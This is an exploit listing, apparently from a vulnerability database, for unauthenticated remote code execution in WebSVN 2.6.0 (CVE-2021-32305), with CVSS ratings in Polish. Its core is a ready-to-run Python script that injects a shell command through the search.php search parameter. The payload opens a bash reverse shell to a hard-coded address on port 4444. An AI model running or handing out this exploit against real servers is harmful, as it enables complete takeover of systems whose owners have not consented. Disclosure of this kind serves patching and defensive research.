Websvn 2.6.0 Remote Code Execution

2021.06.26
Credit: g0ldm45k
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


Ogólna skala CVSS: 10/10
Znaczenie: 10/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated) # Date: 20/06/2021 # Exploit Author: g0ldm45k # Vendor Homepage: https://websvnphp.github.io/ # Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0 # Version: 2.6.0 # Tested on: Docker + Debian GNU/Linux (Buster) # CVE : CVE-2021-32305 import requests import argparse from urllib.parse import quote_plus PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'" REQUEST_PAYLOAD = '/search.php?search=";{};"' parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.') parser.add_argument('target', type=str, help="Target URL.") args = parser.parse_args() if args.target.startswith("http://") or args.target.startswith("https://"): target = args.target else: print("[!] Target should start with either http:// or https://") exit() requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD))) print("[*] Request send. Did you get what you wanted?")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top